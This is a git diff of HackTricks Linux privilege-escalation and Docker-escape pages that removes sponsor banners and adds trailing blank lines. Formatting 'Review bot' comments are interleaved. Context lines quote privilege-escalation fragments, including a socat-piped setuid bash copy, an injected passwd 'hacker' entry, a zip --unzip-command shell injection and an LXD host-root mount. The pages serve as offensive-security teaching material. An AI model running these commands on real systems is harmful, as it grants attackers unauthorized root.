diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md
index afccf5db5..2fb4e830e 100644
--- a/src/linux-hardening/privilege-escalation/README.md
+++ b/src/linux-hardening/privilege-escalation/README.md
@@ -1655,3 +1655,5 @@ cisco-vmanage.md
- [https://www.linode.com/docs/guides/what-is-systemd/](https://www.linode.com/docs/guides/what-is-systemd/)
{{#include ../../banners/hacktricks-training.md}}
+
+
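Review bot: the two `+` lines in this hunk append two blank lines after the final `{{#include ../../banners/hacktricks-training.md}}`, and the same pair is appended at the end of nearly every other file touched by this patch. The extra lines carry no content, and markdown linters flag both consecutive blank lines and more than one trailing newline at end of file; end each file with a single newline instead, or drop these EOF hunks altogether since they are unrelated to the banner removal the patch is about.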
diff --git a/src/linux-hardening/privilege-escalation/docker-security/README.md b/src/linux-hardening/privilege-escalation/docker-security/README.md
index d48f733d4..4fd8f33e2 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/README.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/README.md
@@ -2,14 +2,6 @@
{{#include ../../../banners/hacktricks-training.md}}
-
-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=docker-security) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-security" %}
-
## **Basic Docker Engine Security**
The **Docker engine** employs the Linux kernel's **Namespaces** and **Cgroups** to isolate containers, offering a basic layer of security. Additional protection is provided through **Capabilities dropping**, **Seccomp**, and **SELinux/AppArmor**, enhancing container isolation. An **auth plugin** can further restrict user actions.
@@ -104,16 +96,6 @@ tar -zcvf private_keys_backup.tar.gz ~/.docker/trust/private
When switching Docker hosts, it's necessary to move the root and repository keys to maintain operations.
----
-
-
-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=docker-security) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-security" %}
-
## Containers Security Features
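Review bot: the removed `---` at the start of this hunk is a horizontal rule sitting between the "When switching Docker hosts, it's necessary to move the root and repository keys" paragraph and `## Containers Security Features`, and it is not obviously part of the Trickest banner that follows it. If the rule was the section separator closing the content-trust material, keep the `---` and remove only the banner lines; if it was introduced together with the banner, dropping it is fine but should be confirmed rather than assumed.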
@@ -421,12 +403,7 @@ authz-and-authn-docker-access-authorization-plugin.md
- [https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57](https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57)
- [https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/](https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/)
-
-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=docker-security) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-security" %}
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md b/src/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md
index a23a6b769..23c19c7e1 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md
@@ -41,3 +41,5 @@ You could also **abuse a mount to escalate privileges** inside the container.
In this page we have discussed ways to escalate privileges using docker flags, you can find **ways to abuse these methods using curl** command in the page:
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/apparmor.md b/src/linux-hardening/privilege-escalation/docker-security/apparmor.md
index 0455067e0..8290b7189 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/apparmor.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/apparmor.md
@@ -291,3 +291,5 @@ chmod +x /tmp/test.pl
```
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md b/src/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md
index 3cef5bc8e..e6bcdf1ff 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md
@@ -194,3 +194,5 @@ Remember to **re-enable the plugin after escalating**, or a **restart of docker
- [https://staaldraad.github.io/post/2019-07-11-bypass-docker-plugin-with-containerd/](https://staaldraad.github.io/post/2019-07-11-bypass-docker-plugin-with-containerd/)
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/cgroups.md b/src/linux-hardening/privilege-escalation/docker-security/cgroups.md
index 82614f093..fa609e204 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/cgroups.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/cgroups.md
@@ -88,3 +88,5 @@ The **root cgroup** is an exception to these rules, allowing direct process plac
- **Book: How Linux Works, 3rd Edition: What Every Superuser Should Know By Brian Ward**
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md
index e19fddb22..be328c4c6 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md
@@ -2,14 +2,6 @@
{{#include ../../../../banners/hacktricks-training.md}}
-
-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=docker-breakout-privilege-escalation) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-breakout-privilege-escalation" %}
-
## Automatic Enumeration & Escape
- [**linpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS): It can also **enumerate containers**
@@ -503,13 +495,6 @@ cat /proc/self/status | grep CapEff
The second technique explained in the post [https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/](https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/) indicates how you can abuse bind mounts with user namespaces, to affect files inside the host (in that specific case, delete files).
-
-
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=docker-breakout-privilege-escalation) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-breakout-privilege-escalation" %}
-
## CVEs
### Runc exploit (CVE-2019-5736)
@@ -650,11 +635,6 @@ If you are in **userspace** (**no kernel exploit** involved) the way to find new
- [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket)
- [https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4)
-
-
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=docker-breakout-privilege-escalation) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-breakout-privilege-escalation" %}
-
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
index 7d16ec4a4..2db7f565d 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
@@ -59,3 +59,5 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md
index 5c3c57d9f..686432056 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md
@@ -83,3 +83,5 @@ cat ${OUTPUT_PATH}
```
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
index 718263059..889b3bf02 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
@@ -2,10 +2,6 @@
{{#include ../../../../banners/hacktricks-training.md}}
-
-
-{% embed url="https://websec.nl/" %}
-
The exposure of `/proc` and `/sys` without proper namespace isolation introduces significant security risks, including attack surface enlargement and information disclosure. These directories contain sensitive files that, if misconfigured or accessed by an unauthorized user, can lead to container escape, host modification, or provide information aiding further attacks. For instance, incorrectly mounting `-v /proc:/host/proc` can bypass AppArmor protection due to its path-based nature, leaving `/host/proc` unprotected.
**You can find further details of each potential vuln in** [**https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts**](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts)**.**
@@ -175,8 +171,6 @@ This directory permits access to modify kernel variables, usually via `sysctl(2)
- [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc_group_understanding_hardening_linux_containers-1-1.pdf)
- [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container_whitepaper.pdf)
-
-
-{% embed url="https://websec.nl/" %}
-
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md b/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md
index ce967ad2d..95f831cab 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md
@@ -240,3 +240,5 @@ PID USER TIME COMMAND
- [https://www.redhat.com/sysadmin/privileged-flag-container-engines](https://www.redhat.com/sysadmin/privileged-flag-container-engines)
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md
index 6df879add..94f14f8c2 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md
@@ -45,3 +45,5 @@ user-namespace.md
{{#endref}}
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md
index d7f4c2d65..d03634d4f 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md
@@ -90,3 +90,5 @@ Also, you can only **enter in another process namespace if you are root**. And y
- [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md
index 14b23338a..498749fc3 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md
@@ -99,3 +99,5 @@ ipcs -m # Nothing is seen
- [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md
index 7cdc2cf0d..2dc22792b 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md
@@ -134,3 +134,5 @@ vmware-root_662-2689143848
- [https://unix.stackexchange.com/questions/464033/understanding-how-mount-namespaces-work-in-linux](https://unix.stackexchange.com/questions/464033/understanding-how-mount-namespaces-work-in-linux)
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md
index 8ab89ce7f..3a82a4686 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md
@@ -85,3 +85,5 @@ Also, you can only **enter in another process namespace if you are root**. And y
- [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md
index 0d4297366..90c5d3af2 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md
@@ -89,3 +89,5 @@ Also, you can only **enter in another process PID namespace if you are root**. A
- [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md
index 5d2201886..7021fed99 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md
@@ -70,3 +70,5 @@ nsenter -T TARGET_PID --pid /bin/bash
```
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md
index 88d39ccc6..58ae871e8 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md
@@ -146,3 +146,5 @@ Probando: 0x141 . . . Error
```
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md
index 62b92742a..66ef3998c 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md
@@ -76,3 +76,5 @@ nsenter -u TARGET_PID --pid /bin/bash
```
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/seccomp.md b/src/linux-hardening/privilege-escalation/docker-security/seccomp.md
index 17ec393d2..a61c3e964 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/seccomp.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/seccomp.md
@@ -156,3 +156,5 @@ Following output shows the “docker inspect” displaying the profile:
```
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md b/src/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md
index a733d5934..1be4c1caf 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md
@@ -28,3 +28,5 @@ Coming at some point of 2023...
\***\*[**In this post,**](https://www.form3.tech/engineering/content/exploiting-distroless-images) it is explained that the binary **`openssl`** is frequently found in these containers, potentially because it's **needed\*\* by the software that is going to be running inside the container.
{{#include ../../../banners/hacktricks-training.md}}
+
+
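Review bot: the context line above the include has broken emphasis markup (`\***\*[**In this post,**](...)` and `**needed\*\* by`), which renders with literal asterisks and backslashes around the link and the word `needed`. Since this file is already being edited, fix the escaping in the same change so it reads `[**In this post**](https://www.form3.tech/engineering/content/exploiting-distroless-images) it is explained that the binary **`openssl`** is frequently found in these containers, potentially because it's **needed** by the software that is going to be running inside the container.` The `Coming at some point of 2023...` placeholder shown in the hunk header is also stale and could go in the same pass.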
diff --git a/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md b/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md
index f34a6d548..92cbb164a 100644
--- a/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md
+++ b/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md
@@ -262,3 +262,5 @@ Inside OpenBSD the **auth** group usually can write in the folders _**/etc/skey*
These permissions may be abused with the following exploit to **escalate privileges** to root: [https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot)
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md b/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md
index f308931ab..7ec437f13 100644
--- a/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md
+++ b/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md
@@ -89,3 +89,5 @@ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursiv
```
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/ld.so.conf-example.md b/src/linux-hardening/privilege-escalation/ld.so.conf-example.md
index ab2683a9b..5bb829d3e 100644
--- a/src/linux-hardening/privilege-escalation/ld.so.conf-example.md
+++ b/src/linux-hardening/privilege-escalation/ld.so.conf-example.md
@@ -151,3 +151,5 @@ ldd sharedvuln
**As you can see, having sudo privileges over `ldconfig` you can exploit the same vulnerability.**
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/linux-active-directory.md b/src/linux-hardening/privilege-escalation/linux-active-directory.md
index 5e355bae5..ee8c31452 100644
--- a/src/linux-hardening/privilege-escalation/linux-active-directory.md
+++ b/src/linux-hardening/privilege-escalation/linux-active-directory.md
@@ -2,8 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
-{% embed url="https://websec.nl/" %}
-
A linux machine can also be present inside an Active Directory environment.
A linux machine in an AD might be **storing different CCACHE tickets inside files. This tickets can be used and abused as any other kerberos ticket**. In order to read this tickets you will need to be the user owner of the ticket or **root** inside the machine.
@@ -125,6 +123,6 @@ crackmapexec 10.XXX.XXX.XXX -u 'ServiceAccount$' -H "HashPlaceholder" -d "YourDO
- [https://github.com/TarlogicSecurity/tickey](https://github.com/TarlogicSecurity/tickey)
- [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory)
-{% embed url="https://websec.nl/" %}
-
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/linux-capabilities.md b/src/linux-hardening/privilege-escalation/linux-capabilities.md
index 2fa1b2717..7808490a3 100644
--- a/src/linux-hardening/privilege-escalation/linux-capabilities.md
+++ b/src/linux-hardening/privilege-escalation/linux-capabilities.md
@@ -2,11 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
-
-
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.\\
-
-{% embed url="https://www.rootedcon.com/" %}
## Linux Capabilities
@@ -346,14 +341,6 @@ docker run --rm -it --cap-add=ALL r.j3ss.co/amicontained bash
docker run --rm -it --cap-drop=ALL --cap-add=SYS_PTRACE r.j3ss.co/amicontained bash
```
-
-
-
-
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
-
-{% embed url="https://www.rootedcon.com/" %}
-
## Privesc/Container Escape
Capabilities are useful when you **want to restrict your own processes after performing privileged operations** (e.g. after setting up chroot and binding to a socket). However, they can be exploited by passing them malicious commands or arguments which are then run as root.
@@ -1039,13 +1026,6 @@ int main(int argc,char* argv[] )
**The code of this technique was copied from the laboratory of "Abusing DAC_READ_SEARCH Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com)
-
-
-
-
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
-
-{% embed url="https://www.rootedcon.com/" %}
## CAP_DAC_OVERRIDE
@@ -1437,13 +1417,6 @@ kill -s SIGUSR1
electron-cef-chromium-debugger-abuse.md
{{#endref}}
-
-
-
-
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
-
-{% embed url="https://www.rootedcon.com/" %}
## CAP_NET_BIND_SERVICE
@@ -1700,10 +1673,6 @@ In summary, `CAP_SETPCAP` allows a process to modify the capability sets of othe
- [https://labs.withsecure.com/publications/abusing-the-access-to-mount-namespaces-through-procpidroot](https://labs.withsecure.com/publications/abusing-the-access-to-mount-namespaces-through-procpidroot)
-
-
-
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
-
-{% embed url="https://www.rootedcon.com/" %}
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/logstash.md b/src/linux-hardening/privilege-escalation/logstash.md
index fe091391a..bdf1cc346 100644
--- a/src/linux-hardening/privilege-escalation/logstash.md
+++ b/src/linux-hardening/privilege-escalation/logstash.md
@@ -59,3 +59,5 @@ With **config.reload.automatic: true** in **/etc/logstash/logstash.yml**, Logsta
## References
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md b/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md
index 679d2a521..0fae9bba6 100644
--- a/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md
+++ b/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md
@@ -124,3 +124,5 @@ drwxr-x--- 6 1008 1009 1024 Apr 5 2017 9.3_old
```
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/payloads-to-execute.md b/src/linux-hardening/privilege-escalation/payloads-to-execute.md
index 37626a2de..c308fb270 100644
--- a/src/linux-hardening/privilege-escalation/payloads-to-execute.md
+++ b/src/linux-hardening/privilege-escalation/payloads-to-execute.md
@@ -133,3 +133,5 @@ echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysal
```
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md b/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md
index e54915fa9..3b23e4f9f 100644
--- a/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md
+++ b/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md
@@ -42,3 +42,5 @@ runc run demo
> This won't always work as the default operation of runc is to run as root, so running it as an unprivileged user simply cannot work (unless you have a rootless configuration). Making a rootless configuration the default isn't generally a good idea because there are quite a few restrictions inside rootless containers that don't apply outside rootless containers.
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/selinux.md b/src/linux-hardening/privilege-escalation/selinux.md
index 548f3d785..f2d1a3f5a 100644
--- a/src/linux-hardening/privilege-escalation/selinux.md
+++ b/src/linux-hardening/privilege-escalation/selinux.md
@@ -21,3 +21,5 @@ system_u:system_r:container_t:s0:c647,c780
There are SELinux users in addition to the regular Linux users. SELinux users are part of an SELinux policy. Each Linux user is mapped to a SELinux user as part of the policy. This allows Linux users to inherit the restrictions and security rules and mechanisms placed on SELinux users.
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/socket-command-injection.md b/src/linux-hardening/privilege-escalation/socket-command-injection.md
index 3b5a9002d..28474ef58 100644
--- a/src/linux-hardening/privilege-escalation/socket-command-injection.md
+++ b/src/linux-hardening/privilege-escalation/socket-command-injection.md
@@ -42,3 +42,5 @@ echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;" | socat -
```
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md b/src/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md
index 11d4253c5..d4f0faf41 100644
--- a/src/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md
+++ b/src/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md
@@ -50,3 +50,5 @@ for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8
**For further details check the post [https://blog.hrncirik.net/cve-2023-46214-analysis](https://blog.hrncirik.net/cve-2023-46214-analysis)**
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md b/src/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md
index 774e13999..97b18db59 100644
--- a/src/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md
+++ b/src/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md
@@ -28,3 +28,5 @@ Another option, is that the user owner of the agent and root may be able to acce
**Check the [original research here](https://www.clockwork.com/insights/ssh-agent-hijacking/)**
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md b/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md
index d497174d6..a66aa27b0 100644
--- a/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md
+++ b/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md
@@ -70,3 +70,5 @@ zip name.zip files -T --unzip-command "sh -c whoami"
```
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/write-to-root.md b/src/linux-hardening/privilege-escalation/write-to-root.md
index 65f4bbafc..e96ce7427 100644
--- a/src/linux-hardening/privilege-escalation/write-to-root.md
+++ b/src/linux-hardening/privilege-escalation/write-to-root.md
@@ -48,3 +48,5 @@ TODO
The file located in `/proc/sys/fs/binfmt_misc` indicates which binary should execute whic type of files. TODO: check the requirements to abuse this to execute a rev shell when a common file type is open.
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/useful-linux-commands/README.md b/src/linux-hardening/useful-linux-commands/README.md
index f69d43525..871e7427d 100644
--- a/src/linux-hardening/useful-linux-commands/README.md
+++ b/src/linux-hardening/useful-linux-commands/README.md
@@ -1,12 +1,5 @@
# Useful Linux Commands
-
-
-\
